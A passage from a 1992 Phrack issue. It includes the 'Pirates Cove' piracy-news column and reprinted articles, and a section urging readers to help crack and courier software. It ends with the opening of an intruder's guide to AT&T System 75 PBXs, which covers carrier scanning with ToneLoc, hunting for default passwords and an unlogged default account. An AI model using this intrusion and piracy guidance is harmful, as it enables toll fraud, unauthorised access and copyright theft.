  2193.     btoa                          Binary files will be mailed in btoa format.
  2194.     ls (or dir) PLACE             Short (long) directory listing.
  2195.     get FILE                      Get a file and have it mailed to you.
  2196.     quit                          Terminate script, ignore rest of mail message
  2197.                                   (use if you have a .signature or are a
  2198.                                    VMSMAIL user).
  2199.  
  2200.    Notes:
  2201.    -> You must give a "connect" command (default host is gatekeeper.dec.com,
  2202.       default user is anonymous, default password is your mail address).
  2203.    -> Binary files will not be compressed unless "compress" or "compact"
  2204.       command is given; use this if at all possible, it helps a lot.
  2205.    -> Binary files will always be formatted into printable ASCII with "btoa" or
  2206.       "uuencode" (default is "btoa").
  2207.    -> All retrieved files will be split into 60KB chunks and mailed.
  2208.    -> VMS/DOS/Mac versions of uudecode, atob, compress and compact are
  2209.       available, ask your LOCAL wizard about them.
  2210.    -> It will take ~1-1/2 day for a request to be processed.  Once the jobs has
  2211.       been accepted by the FTP daemon, you'll get a mail stating the fact that
  2212.       your job has been accepted and that the result will be mailed to you.
  2213. _______________________________________________________________________________
  2214.  
  2215.                                 ==Phrack Inc.==
  2216.  
  2217.                    Volume Four, Issue Forty-One, File 5 of 13
  2218.  
  2219.                                   Pirates Cove
  2220.  
  2221.                                    By Rambone
  2222.  
  2223.  
  2224. Welcome back to Pirates Cove.  News about software piracy, its effects, and the
  2225. efforts of the software companies to put and end to it are now at an all time
  2226. high.  Additionally, there is an added interest among the popular media towards
  2227. the other goings-on in the piracy underworld.  Additionally over the past few
  2228. months there have been several major crackdowns around the world.  Not all of
  2229. the news is terribly recent, but a lot of people probably didn't hear about it
  2230. at the time so read on and enjoy.
  2231.  
  2232. If you appreciate this column in Phrack, then also be sure to send a letter to
  2233. "phracksub@stormking.com" and let them know.  Thanks.
  2234. _______________________________________________________________________________
  2235.  
  2236.  More Than $100,000 In Illegal Software Seized
  2237.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2238. WASHINGTON -- (BUSINESS WIRE) -- Illegal software valued in excess of $100,000
  2239. was seized from an electronic bulletin board computer system (BBS)
  2240. headquartered in Baltimore, Maryland, marking the first U.S. case for the
  2241. Business Software Alliance (BSA) against a BBS for pirating software.
  2242.  
  2243. The BSA previously initiated an enforcement campaign against illegal bulletin
  2244. boards in Europe and is investigating illegal boards in Asia.  As part of the
  2245. U.S. seizure, more than $25,000 worth of hardware was confiscated in accordance
  2246. with the court order, and the BBS, known as the APL, is no longer in operation.
  2247.  
  2248. Investigations conducted over the past several months found that, through the
  2249. APL BBS, thousands of illegal copies have been made of various software
  2250. programs.  Plaintiffs in the case include six business software publishers:
  2251. ALDUS, Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.  The
  2252. action against APL was for allegedly allowing BBS users to upload and download
  2253. copyrighted programs.
  2254.  
  2255. Nearly 500 software programs were available for copying through the APL BBS, an
  2256. infringement of software publishers' copyright.  In addition, BSA seized APL's
  2257. business records which detail members' time on the BBS and programs uploaded
  2258. and/or copied.  BSA is currently reviewing these records for possible
  2259. additional legal action against system users who may have illegally uploaded or
  2260. downloaded copyrighted programs.
  2261.  
  2262. "Electronic  bulletin boards create increasingly difficult problems in our
  2263. efforts to combat piracy," according to Robert Holleyman, president of the BSA.
  2264. "While bulletin boards are useful tools to enhance communication channels, they
  2265. also provide easy access for users to illegally copy software," Holleyman
  2266. explained.
  2267.  
  2268. Strict federal regulations prohibit the reproduction of copyrighted software.
  2269. Legislation passed this year by the U.S. Congress contains provisions to
  2270. increase the penalties against copyright infringers to up to five years
  2271. imprisonment and a $250,000 fine.
  2272.  
  2273. The APL investigation, conducted by Software Security International on behalf
  2274. of the BSA, concluded with a raid by Federal Marshals on October 1, 1992.  In
  2275. addition to the six business software publishers, the BSA action was taken on
  2276. behalf of Nintendo.
  2277.  
  2278. Bulletin boards have grown in popularity over the past several years, totaling
  2279. approximately 2000 in the United States alone.  Through a modem, bulletin board
  2280. users can easily communicate with other members.  The BSA has recently stepped
  2281. up its worldwide efforts to eradicate the illegal copying of software which
  2282. occurs on some boards.
  2283.  
  2284. The BSA is an organization devoted to combating software theft. Its worldwide
  2285. campaign encompasses education, public policy, and enforcement programs in more
  2286. than 30 countries.  The members of the BSA include:  ALDUS, APPLE COMPUTER,
  2287. Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.
  2288.  
  2289. The BSA operates an Anti-piracy Hotline (800-688-2721) for callers seeking
  2290. information about software piracy or to report suspected incidents of software
  2291. theft.
  2292.  
  2293. CONTACT:  Diane Smiroldo, Business Software Alliance, (202)727-7060
  2294.  
  2295. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2296.  
  2297.  Only The Beginning
  2298.  ~~~~~~~~~~~~~~~~~~
  2299. The bust of APL BBS had made unprecedented impacts in the pirate world because
  2300. of the implications behind the actual arrest.  Business Software Alliance
  2301. (BSA), representing many major business software companies along with Nintendo,
  2302. joined forces to hit APL very hard.  They joined forces to permanently shut
  2303. down APL and are, for the first time, trying to pursue the users that had an
  2304. active role in the usage of the BBS.
  2305.  
  2306. Trying to figure out who had uploaded and downloaded files through this BBS and
  2307. taking legal recourse against them is a very strong action and has never been
  2308. done before.  One of the major problem I see with this is how do they know if
  2309. what the records show was the actual user or someone posing as another user?
  2310. Also, how could they prove that an actual program was downloaded by an actual
  2311. user and not by someone else using his account?  What if one user had logged on
  2312. one time, never called back, and someone else had hacked their account?  I'm
  2313. also sure a sysop has been known, on occasion, to "doctor" someone's account to
  2314. not allow them to download when they have been leeching.
  2315.  
  2316. The points I bring up are valid as far as I am concerned and unless the Secret
  2317. Service had logs and phone numbers of people actually logged on at the time, I
  2318. don't see how they have a case.  I'm sure they have a great case against the
  2319. sysop and will pursue the case to the highest degree of the law, but if they
  2320. attempt to arrest users, I foresee the taxpayers' money going straight down the
  2321. drain.
  2322. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2323.  
  2324.  BSA Hits Europe
  2325.  ~~~~~~~~~~~~~~~
  2326. The Business Software Alliance reached their arms out across the Atlantic and
  2327. landed in Germany.  Along with Interpol and the local police, they proceeded to
  2328. take down 80% of the boards in Berlin.  One of the contributing factors in
  2329. these busts was that the majority of the boards busted were also involved in
  2330. toll fraud.  Until recently, blue boxing was the predominate means of
  2331. communication with the United States and other countries in Europe. When most
  2332. of these sysops were arrested, they had been actively blue boxing on a regular
  2333. basis.  Unfortunately, many parts of Germany had already upgraded their phone
  2334. system, and it became very risky to use a blue box.  It didn't stop most people
  2335. and they soon became easy targets for Interpol.  The other means of LD usage
  2336. for Germans was AT&T calling cards which now are very common. The local police
  2337. along with the phone company gathered months of evidence before the city wide
  2338. sweep of arrests.
  2339.  
  2340. The busts made a bigger impact in Europe than anyone would have imagined.  Some
  2341. of the bigger boards in Europe have been taken down by the sysops and many will
  2342. never go back up.  Many sysops have been arrested and fined large amounts of
  2343. money that they will be paying off for a long time.  BSA, along with local
  2344. police and Interpol, has done enough damage in a few days that will change
  2345. European Boards for a long time.
  2346. _______________________________________________________________________________
  2347.  
  2348.  IBM:  Free Disks For The Taking
  2349.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2350. In a vain effort to increase sales, IBM decided to send out 21 high density
  2351. diskettes to anyone who called.  On these diskettes was a new beta copy of OS/2
  2352. Version 2.1.  They were hoping to take a cheap way out by sending a few out to
  2353. people who would install it and send in beta reports.  What they got was
  2354. thousands of people calling in when they heard the word who were promptly Fed
  2355. Ex'ed the disks overnight.  The beta was not the concern of most, just the
  2356. diskettes that were in the package.  The actual beta copy that was sent out was
  2357. bug ridden anyway and was not of use on most systems.
  2358.  
  2359. When IBM finally woke up and figured out what was going on, they had already
  2360. sent out thousands of copies.  Some even requested multiple copies.  IBM then
  2361. proceeded to charge for the shipment and disks, but it was way too late, and
  2362. they had gone over budget.  Way to go IBM, no wonder your stock has plummeted
  2363. to $55 a share.
  2364. _______________________________________________________________________________
  2365.  
  2366.  Users Strike Back At U.S. Robotics
  2367.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2368. Since 1987, U.S. Robotics (USR) has been a standard among sysops and many end
  2369. users.  With the loyal following also came terrible customer service and long
  2370. delays in shipments.  Their modems, being in as much demand as they are, soon
  2371. showed the results of shortcuts in the manufacture of certain parts in some of
  2372. the more popular modems.  The most infamous instance of this happening was the
  2373. Sportster model which was a V.32bis modem which could be bought at a much lower
  2374. price than that of the Dual Standard.  The catch was that they cut some corners
  2375. and used that same communication board for both the Sportster and the Dual
  2376. Standard.  They assumed they could save money by using the same board on both
  2377. modems.  Boy were they wrong.
  2378.  
  2379. All that was done to the Sportster was to disable the HST protocol that would
  2380. make it into a Dual.  With the proper init string, one could turn a Sportster,
  2381. ROM version 4.1, into a full Dual in the matter of seconds and have spent 1/3
  2382. of the price of a full Dual Standard.
  2383.  
  2384. This outraged USR when they found out.  They first denied that it could be
  2385. done.  When they found out that it had gotten too wide-spread and could not be
  2386. stopped, they then proceeded to tell the public it was a copyright infringement
  2387. to use the "bogus" init string and threatened to sue anyone who attempted to
  2388. use it.  Most people laughed at that idea and continued to use it while giving
  2389. "the bird" to USR.  Some vendors are now even trying to make a buck and sell
  2390. Sportsters at a higher price, and some are even selling them as Duals.
  2391.  
  2392. Obviously, they have now discontinued making the Sportsters the cheap way and
  2393. are now making two separate boards for both modems.  The versions with the ROM
  2394. 4.1 are still floating around, can be found almost anywhere, and will always
  2395. have the capabilities to be run as a full Dual.  Better watch out though.  The
  2396. USR police might come knocking on your door <g>.
  2397. _______________________________________________________________________________
  2398.  
  2399.  Warez Da Scene?
  2400.  ~~~~~~~~~~~~~~~
  2401. Over the last 6 months there have been several changing of hands in the major
  2402. pirate groups.  One person who supplies them has bounced to 3 groups in the
  2403. last four months.  One group fell apart because of a lack of support from the
  2404. major members, but is making a valiant comeback.  And yet another has almost
  2405. split into two like AT&T stock.  We'll have to see what comes of that.
  2406.  
  2407. While only about 15% or so actually doing anything for the scene, the other 85%
  2408. seem to complain and bitch.  Either the crack doesn't work or someone forgot to
  2409. put in the volume labels.  Jesus, how much effort does it take to say, "Hey,
  2410. thanks for putting this out, but...".  The time and effort it takes to acquire
  2411. the program, check to see if it needs to be cracked, package it, and have it
  2412. sent out to the boards is time- and money-consuming and gets very little
  2413. appreciation by the majority of the users around the world.
  2414.  
  2415. Why not see some users send in donations to the group for the appreciation it
  2416. takes to send the files out?  Why not see more users volunteer to help courier
  2417. the programs around?  Help crack them?  Make some cheats, or type of some docs?
  2418. Be a part of the solution instead of the problem.  It would create less
  2419. headaches and gain more respect from the members who take the time and effort
  2420. to make this all possible.
  2421. _______________________________________________________________________________
  2422.  
  2423.  Review Of The Month
  2424.  ~~~~~~~~~~~~~~~~~~~
  2425. I usually type up a review of the best program I have seen since the last
  2426. issue, but since I was so disappointed with this game, I have to say something
  2427. about it.
  2428.  
  2429.  
  2430.   ___________________________________________________________________________
  2431.  |                                                                           |
  2432.  |   RELEASE INFORMATION                                                     |
  2433.  |___________________________________________________________________________|
  2434.  |                                                                           |
  2435.  | Supplied by : ACTION MAN & MUNCHIE ...................................... |
  2436.  | Cracked by  : HARD CORE ................................................. |
  2437.  | Protection  : Easy Password ............................................. |
  2438.  | Date        : 16th December 1992 (Still 14 days left!) .................. |
  2439.  | Graphics    : ALL ....................................................... |
  2440.  | Sound       : ALL ....................................................... |
  2441.  | Game Size   : 5 1.44Mb disks , Installation from floppies ............... |
  2442.  |___________________________________________________________________________|
  2443.  
  2444.  
  2445. One of the most awaited games of the year showed up at my doorstep, just
  2446. itching to be installed:  F15-]I[.  I couldn't wait to get this installed on
  2447. the hard drive and didn't care how much space it took up.  I was informed
  2448. during installation that the intro would take up over 2 megs of hard drive
  2449. space, but I didn't care.  I wanted to see it all.  Once I booted it and saw
  2450. the intro, I thought the game would be the best I had seen.  Too bad the other
  2451. 8 megs turned out to be a waste of hard drive space.
  2452.  
  2453. I started out in fast mode, getting right up in the skies.  Too bad that's the
  2454. only thing on the screen that I could recognize.  Zooming down towards the
  2455. coast, I noticed that it looked damn close to the land and, in fact, it might
  2456. as well have been.  The ocean consist of powder blue dots and had almost the
  2457. same color consistency as the land.  Not finding anything in the air to shoot
  2458. at, I proceeded to shoot a missile at anything that I thought would blow up.
  2459. This turned out to be just about everything, including bridges.  Let a few
  2460. gunshots loose on one and see a large fireworks display like you dropped a
  2461. nuclear bomb on it.
  2462.  
  2463. Close to 3 hours later, I finally found a jet, got it into my sights and shot 3
  2464. missiles at it.   A large explosion, another one, and then he flew past me
  2465. without even a dent showing.  I shot my last 2 at it, same result.  Thus my
  2466. conclusion:  the Russians must have invincible planes.  Either that or F-15 ]I[
  2467. has some major bugs.  I'll take a wild guess and say, hmm, bugs.
  2468.  
  2469. This game is not worth the box it comes in and I would not suggest anyone,
  2470. outside of a blind person, from purchasing this.  I hate ratings but I'll give
  2471. it a 2/10.  The 2 is for modem play, which is not bad, but not good enough.
  2472. _______________________________________________________________________________
  2473.  
  2474.  Piracy's Illegal, But Not The Scourge It's Cracked Up To Be     August 9, 1992
  2475.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2476.  By T.R. Reid and Brit Hume (Chicago Tribune)(Page 7)
  2477.  
  2478. The software industry has embarked on one of its periodic public relations
  2479. campaigns to get people to believe it's being robbed blind by software pirates.
  2480. Even The New York Times took the claims seriously and ran a front-page story
  2481. illustrated by a picture of a cheerful computer hacker wearing a Hawaiian shirt
  2482. sitting in his basement surrounded by PCs and awash in piles of disks, many of
  2483. them containing bootleg programs.
  2484.  
  2485. With a straight face, the Times reported the industry's claim that in 1990, the
  2486. last year for which figures are available, programs worth $2.4 billion were
  2487. pirated, an amount equal to nearly half the industry's total sales of $5.7
  2488. billion.  In fact, the software industry has no way of knowing how much it lost
  2489. to illegal copying, but the $2.4 billion figure is almost certainly rot.
  2490. Here's why.
  2491.  
  2492. It is true that it's a snap to make an "illegal" copy of a computer program and
  2493. equally true that the practice is rampant.  You just put a disk in the drive,
  2494. issue the copy command, and the computer does the rest.
  2495.  
  2496. But there is simply no way the software industry can estimate accurately how
  2497. many illegal copies there are, and even if it could, it couldn't possibly
  2498. determine how many of them represent lost sales.  It does not follow that every
  2499. time somebody makes a bootleg copy, the industry loses a sale.  That would be
  2500. true only if the software pirate would have paid for the program had he or she
  2501. not been able to get it for free.
  2502.  
  2503. Indeed, some of those illegal copies undoubtedly lead to actual sales.  Once
  2504. users try a program, particularly a full-scale application such as a word
  2505. processor or database, and like it, they may decide they need the instruction
  2506. book and want to be able to phone for help in using the program.
  2507.  
  2508. The only way to get those things is to buy the software.  If that sounds
  2509. pie-in-the-sky, consider that an entire branch of the industry has developed
  2510. around just that process.  It's called shareware -- software that is offered
  2511. free to try.  If you like it, you are asked to buy it.  In return, you get a
  2512. bound manual and telephone support.
  2513.  
  2514. The word processor with which this column was written, PC-Write, is such a
  2515. program.  So is the telecommunications program by which it was filed, ProComm.
  2516. These programs were both developed by talented independent software developers
  2517. who took advantage of the unprecedented opportunity the personal computer
  2518. provided them.  All they needed was a PC, a desk, a text editor and a special
  2519. software tool called a "compiler."  A compiler translates computer code written
  2520. in a language such as Basic, C or Pascal into the binary code that the computer
  2521. can process.
  2522.  
  2523. Once they had written their programs, they included a set of instructions in a
  2524. text file and a message asking those who liked the software to pay a fee and
  2525. get the benefits of being a "registered" user.  They then passed out copies to
  2526. friends, uploaded them to computer bulletin boards and made them available to
  2527. software libraries.  Everyone was encouraged to use the software -- and to pass
  2528. it on.
  2529.  
  2530. The ease with which the programs can be copied was, far from a problem for
  2531. these developers, the very means of distribution.  It cost them nothing and
  2532. they stood to gain if people thought their program good enough to use.  And
  2533. gain they have.  Both PC-Write and ProComm have made a lot of money as
  2534. shareware, and advanced versions have now been released through commercial
  2535. channels.
  2536.  
  2537. The point here is not that it's okay to pirate software.  It's not, and it's
  2538. particularly dishonest to use a stolen program for commercial purposes.  The
  2539. practice of buying one copy for an entire office and having everybody copy it
  2540. and use the same manual is disgraceful.  Software may be expensive, but it's a
  2541. deductible business expense and worth the price.
  2542.  
  2543. At the same time, it's not such a bad thing to use an unauthorized copy as a
  2544. way of trying out a program before you buy it.  The shareware industry's
  2545. success has proved that can even help sales.
  2546. _______________________________________________________________________________
  2547.  
  2548.  No Hiding From The Software Police                            October 28, 1992
  2549.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2550.  By Elizabeth Weise (The Seattle Times)(Page B9)(Associated Press)
  2551.  
  2552. One call to the Piracy Hotline is all it takes for the Software Police to come
  2553. knocking at your computers.  Parametrix Inc. of Seattle found that out last
  2554. year when the Software Police, also known as the Software Publishers
  2555. Association, showed up with a search warrant and a U.S marshal to audit their
  2556. computers.  The search turned up dozens of copies of unauthorized software
  2557. programs and meant a penalty of $350,000 for Parametrix.
  2558.  
  2559. The SPA says too many companies "softlift" -- buying only one copy of a program
  2560. they need and making copies for as many computers as they have.
  2561.  
  2562. It seems so easy -- and it's just as easy to get caught.
  2563.  
  2564. "It only takes one phone call to the 800 number to get the ball rolling.
  2565. Anyone taking that chance is living on borrowed time," said Peter Beruk,
  2566. litigation manager for the Washington D.C.-based SPA.  "You can run, but you
  2567. can't hide."  And the stakes are getting higher.  A bill is before President
  2568. Bush that would elevate commercial software piracy from a misdemeanor to a
  2569. felony.  The law would impose prison terms of up to five years and fines of up
  2570. to $250,000 for anyone convicted for stealing at least 10 copies of a program,
  2571. or more than $2,500 worth of software.
  2572.  
  2573. Those in the computer industry say softlifting will be hard to prevent unless
  2574. programmers are better policed.  AutoDesk Retail Products in Kirkland has met
  2575. obstacles in educating its staff on the law.  AutoDesk makes computer-assisted
  2576. drawing programs.  "The problem is that you end up employing people who don't
  2577. want to follow convention," AutoDesk manager John Davison said.  "We hire
  2578. hackers.  To them it's not stealing, they just want to play with the programs.
  2579. "You got a computer, you got a hacker, you got a problem."  Bootlegging results
  2580. in an estimated loss of $2.4 million to U.S. software publishers each year,
  2581. Beruk said.  That's out of annual sales of between $6 billion and $7 billion.
  2582. "For every legal copy of a program sold, there's an unauthorized copy of it in
  2583. use on an everyday basis," Beruk said.  As SPA and its member companies see it,
  2584. that's theft, plain and simple.
  2585.  
  2586. SPA was founded in 1984.  One of its purposes: to enforce copyright
  2587. infringement law for software manufacturers.  Since then it has conducted 75
  2588. raids and filed about 300 lawsuits, Beruk said.  Several of the larger raids
  2589. have been in the Northwest.  The SPA settled a copyright lawsuit against
  2590. Olympia-based U.S. Intelco for $50,000 in May.  Last year, the University of
  2591. Oregon Continuation Center in Eugene, Oregon, agreed to pay $130,000 and host a
  2592. national conference on copyright law and software use as part of a negotiated
  2593. settlement with SPA.  The tip-off call often comes to SPA's toll-free Piracy
  2594. Hotline.  It's often disgruntled employees, or ex-employees, reporting that the
  2595. company is running illegal copies of software programs, Beruk said.
  2596.  
  2597. At Parametrix, an investigation backed up the initial report and SPA got a
  2598. search warrant, Beruk said.  President Wait Dalrymple said the company now does
  2599. a quarterly inventory of each computer.  The company brings in an independent
  2600. company once a year to check for unauthorized programs.
  2601.  
  2602. Softlifting, Dalrymple said, can be an easy tangle to get into.  "Our company
  2603. had had extremely rapid growth coupled with similar growth in the number of
  2604. computers we use," he said.  "We had no policy regarding the use of our
  2605. software and simply didn't control what was happening."
  2606.  
  2607. Making bootleg copies of software is copyright infringement, and it's as
  2608. illegal -- and as easy -- as copying a cassette tape or a video tape.  The
  2609. difference is in magnitude.  A cassette costs $8, a video maybe $25, while
  2610. computer programs can cost hundreds and even thousands of dollars.  Audio and
  2611. video tapes come with FBI warnings of arrest for illegal copying.  Software
  2612. comes with a notice of copyright penalties right on the box.  But despite such
  2613. threats, softlifting isn't taken seriously, said Julie Schaeffer, director of
  2614. the Washington Software Association.  "It's really in the same arena of
  2615. intellectual property," Schaeffer said.  "But people don't think about the
  2616. hours and hours of work that goes into writing a program."
  2617.  
  2618. The Boeing Co. in Seattle is one company that tries hard not to break the law.
  2619. It has a department of Software Accountability, which monitors compliance with
  2620. software licensing.
  2621.  
  2622. AutoDesk resorts to a physical inventory of the software manuals that go with a
  2623. given program.  If programmers don't have the manuals in their work cubicles,
  2624. they can be fined $50.
  2625.  
  2626. The SPA itself said the problem is more one of education than enforcement.
  2627. "Because copying software is so easy and because license agreements can be
  2628. confusing, many people don't realize they're breaking the law," the SPA said.
  2629.  
  2630. Feigning ignorance of the law doesn't help.  With Microsoft products, a user is
  2631. liable as soon as the seal on a package of software is broken.  "At that point
  2632. you've agreed to Microsoft's licensing agreement under copyright law,"
  2633. Microsoft spokeswoman Katy Erlich said.  "It says so right on the package."
  2634. _______________________________________________________________________________
  2635.  
  2636.  Teenage Pirates and the Junior Underworld                    December 11, 1992
  2637.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2638.  by Justin Keery (The Independent)(Page 31)
  2639.  
  2640.                   "By the end of the year, any schoolboy with
  2641.                     a computer who wants Sex will get it."
  2642.  
  2643. The first print-run of 100,000 copies of Madonna's Sex has sold out.  A further
  2644. 120,000 will be printed before Christmas, and bookshops have ordered every last
  2645. one.  But parents beware... around 5,000 school children have their own copy,
  2646. and the number is growing rapidly as floppy disks are circulated in
  2647. playgrounds.
  2648.  
  2649. Viewing the disk edition on a computer reveals television-quality images from
  2650. the book -- the text, it seems, is deemed superfluous.  In disk form the
  2651. pictures can be copied and traded for video games, credibility or hard cash in
  2652. a thriving underground marketplace.  By the end of the year, any schoolboy with
  2653. a computer who wants Sex will get it.  The unlucky will catch a sexually
  2654. transmitted disease in the process -- the Disaster Master virus, found on the
  2655. Independent's copy.
  2656.  
  2657. Sex is a special-interest area in the thriving junior underworld of software
  2658. trading.  Circulation of Madonna's pictures among minors with neither the
  2659. budget nor the facial hair to buy Sex gives Madonna's publishers little cause
  2660. to fear loss of sales.  Neither Secker & Warburg in London nor Time-Warner in
  2661. New York knew of the unofficial digital edition.  But the publishers of
  2662. computer video games have much to lose from playground transactions.
  2663.  
  2664. Sex is not doing a roaring trade, said one schoolboy trader.  Video games, with
  2665. price-tags of up to pounds 40, are what every child wants, but few can afford.
  2666. But who needs to buy, when your classmates will trade copies of the latest
  2667. titles for another game, a glimpse of Madonna or a humble pound coin?
  2668.  
  2669. Games disks are usually uncopyable.  Skilled programmers "crack" the
  2670. protection, as an intellectual challenge and a way of gaining respect in an
  2671. exclusive scene, add "training" options such as extra lives, and post this
  2672. version on a computer bulletin board -- a computer system attached to a
  2673. telephone line where people log in to trade their "wares".
  2674.  
  2675. Most bulletin boards (BBSs) are friendly places where computer freaks exchange
  2676. tips, messages and "public domain" programs, made available by their authors
  2677. free of charge.  But illegitimate operators, or SysOps, look down on "lame"
  2678. legal boards, and "nuke" any public domain material submitted to their systems.
  2679.  
  2680. The larger pirate boards are the headquarters of a cracking group -- often in a
  2681. 15-year-old's bedroom.  There are perhaps 100 in Britain.  Cracked games and
  2682. "demos" publicize phone numbers, and a warning is issued that copyright
  2683. software should not be posted --a disclaimer of questionable legality.  New
  2684. members are asked if they represent law enforcement agencies.  According to a
  2685. warning message on one board, at least one BBS in the United States is operated
  2686. by the FBI.
  2687.  
  2688. Your account at a board may not allow you to download until you upload wares of
  2689. sufficient quality.  Games are considered old after a week, so sexy images,
  2690. "demos" or lists of use to hackers are an alternative trading commodity.
  2691. Available this week, as well as Madonna, are: "lamer's guide to hacking PBXs",
  2692. "Tex" and "Grapevine" -- disk magazines for pirates; and demos -- displays of
  2693. graphical and sound programming prowess accompanied by bragging messages,
  2694. verbal assaults on rival factions and advertisements for BBSs.  According to a
  2695. former police officer, the recipes for LSD and high explosives have circulated
  2696. in the past.
  2697.  
  2698. The board's "download ratio" determines how many disks are traded for every
  2699. contribution -- usually two megabytes are returned for every megabyte
  2700. contributed.  "Leech accounts" (unlimited access with no quotas) are there for
  2701. those foolish enough to spend between pounds 1 and pounds 60 per month.  But
  2702. children can sign on using a pseudonym, upload a "fake" -- garbage data to
  2703. increase their credit -- then "leech" as much as possible before they get
  2704. "nuked" from the user list.
  2705.  
  2706. The "modem trader" is a nocturnal trawler of BBSs, downloading wares, then
  2707. uploading to other boards.  Current modem technology allows users to transfer
  2708. the contents of a disk in 10 minutes.  A "card supplier" can provide a stolen
  2709. US or European phone credit card number.  The scene knows no language barriers
  2710. or border checks, and international cross-fertilization adds diversity to the
  2711. software in circulation.
  2712.  
  2713. Through the unsociable insomniac trader, or the wealthier "lamer" with a paid-
  2714. up "leech account," games reach the playground.  The traders and leeches gain
  2715. extra pocket money by selling the disks for as little as pounds 1, and from
  2716. there the trade begins.
  2717.  
  2718. Some market-traders have realized the profit potential, obtaining cracked
  2719. software through leech accounts and selling the disks on stalls.  Sold at a
  2720. pocket-money price of pounds 1 per disk, many games reach schools.  The trading
  2721. of copyright software is illegal but the perpetrators stand little chance of
  2722. getting caught and are unlikely to be prosecuted.
  2723.  
  2724. The victims, software houses, suffer real damage.  Sales of Commodore Amiga
  2725. computers equal the dedicated games machines -- the Sega Megadrive or Nintendo,
  2726. yet sales of Amiga games (on disk and therefore pirate fodder) often reach only
  2727. one third of the volume of their copy-proof console cartridge counterparts.
  2728. Despite his preference for Amiga technology, Phil Thornton of System 3 Software
  2729. is "seriously reconsidering" future development of Amiga games. Myth, a two-
  2730. year project, sold pitiful amounts.  Mr. Thornton was called by a pirate the
  2731. day it was released -- the game was available on a bulletin board.  Because of
  2732. piracy, the sequel to the successful Putty will be mastered instead for the
  2733. Nintendo console.
  2734.  
  2735. This tactic may not help for long.  The cracked Amiga release of Putty carried
  2736. an advertisement (added by pirates) for a Nintendo cartridge "backup" device.
  2737. Transferred to disk, a "pirate-proof" console game can be traded like any
  2738. other.  Games for the Nintendo and Sega systems are available on most bulletin
  2739. boards.
  2740.  
  2741. Scotland Yard only takes an interest in bulletin boards bearing pornography,
  2742. though most also carry pirate software.  Funded by the software industry, the
  2743. Federation Against Software Theft has successfully prosecuted only one board,
  2744. with "more pending."
  2745.  
  2746. This Christmas parents will buy hundreds of thousands of video games.  Some
  2747. children will ask for modems; thus games will be on the bulletin boards by
  2748. Boxing Day, and the first day of term will see the heaviest trading of the
  2749. year.
  2750.  
  2751. AUTHOR'S NOTE:  I considered using a pseudonym for this article.  Two years
  2752.                 ago, a Newsweek reporter exposed the North American bulletin
  2753.                 board network.  His credit rating, social security and bank
  2754.                 files were altered in a campaign of intimidation which included
  2755.                 death threats.  Most of those responsible were 15-year-olds.
  2756. _______________________________________________________________________________
  2757.  
  2758.  
  2759.                                 ==Phrack Inc.==
  2760.  
  2761.                    Volume Four, Issue Forty-One, File 6 of 13
  2762.  
  2763.                    A Brief Guide to Definity G Series Systems
  2764.                                      a.k.a
  2765.                                  System 75 - 85
  2766.  
  2767.                             Written by Scott Simpson
  2768.  
  2769.  
  2770.           Greets to Jim Anderson, The Missing Link, Randy Hacker, Dark Druid,
  2771. Nickodemus, Mercury, Renegade, Infinity (enjoy the army!), Weirdo, TomCat,
  2772. GarbageHeap, Phrack Inc.
  2773.  
  2774.  
  2775. Basic History
  2776. ~~~~~~~~~~~~~
  2777. Definity model systems came into existent in the later part of the 1970s.  In
  2778. 1983, AT&T came out with a revised model called 75.  This system was built to
  2779. hold more incoming lines and did not have as many errors as the earlier version
  2780. did.  The 1983 version was replaced with a version re-written in 1986.  Today,
  2781. the systems are referred to as G models.  System 75 is now called G1 and 85 is
  2782. called G2.  A new model is currently available and is called the Definity G3I
  2783. which is Generic 3 with an Intel chip, and Definity G3R which is Generic 3 with
  2784. a Risk chip.  There are 3 different versions to each model.  Version one is the
  2785. most common and it is an XE Single Carrier Unit.  The other two systems are 2
  2786. carriers.  A system will usually cost somewhere around 50 to 80 thousand
  2787. dollars.  You MIGHT come across a smaller version and it is called "Merlin
  2788. Legend."  This system will hold about 50-100 lines.  System 75 & 85 will hold
  2789. around 1000 lines.  System 75/85 are used by companies to house all of their
  2790. incoming lines, as well as to send their incoming lines to destinations set up
  2791. by the owners, whether it be Audix or any other setup.  There are many uses for
  2792. the system besides VMBs and PBXes.  System 75/85 has three main functions that
  2793. hackers are interested in. They are the capabilities of VMB, bridging, and of
  2794. course PBX exchanges.
  2795.  
  2796.  
  2797. Discovering the System
  2798. ~~~~~~~~~~~~~~~~~~~~~~
  2799. When you find a System 75, you will make a 1200/NONE connection (if HST used),
  2800. as most setups have a built in 1200 baud modem.  Normally, the controller
  2801. number will not be in the same prefix as the business or the PBX and the line
  2802. is actually owned by AT&T.  Try CNAing a System 75 line and it will tell you
  2803. that it is owned by AT&T.  Once you find a carrier, you will need to be able to
  2804. display ANSI or some equivalent type of terminal graphics.  Most are set to
  2805. N81, but some may be E71.  My suggestion is to use ToneLoc which is produced by
  2806. Mucho Maas and Minor Threat.  As you know, this program will scan for carriers
  2807. as well as tones.  This program can be found on just about every ELEET H/P BBS.
  2808.  
  2809.  
  2810. Getting into the System
  2811. ~~~~~~~~~~~~~~~~~~~~~~~
  2812. Getting into the system is the easy part if you have the defaults.  You must
  2813. find them on your own and you will find out that a lot of people are not
  2814. willing to trade for them.  There is one default that will enable you to snoop
  2815. around and tell whether or not they have a PBX, provided that they have not
  2816. changed the password or restricted the account.  This one default is usually a
  2817. fully operational account without the privileges of altering any data but I
  2818. have come across a couple of systems where it wouldn't do anything.  Using this
  2819. default account is a good way to start if you can find it.  It is also good to
  2820. use any time you call and don't plan on changing anything.  All actions by this
  2821. account are not kept in the system history file.  Now on to the good stuff!!
  2822.  
  2823.  
  2824. Abusing System 75
  2825. ~~~~~~~~~~~~~~~~~
  2826. After logging into a 75, there are several commands available depending on the
  2827. default you are using.  This part will be for the basics.  I will explain more
  2828. later for the more advanced people.
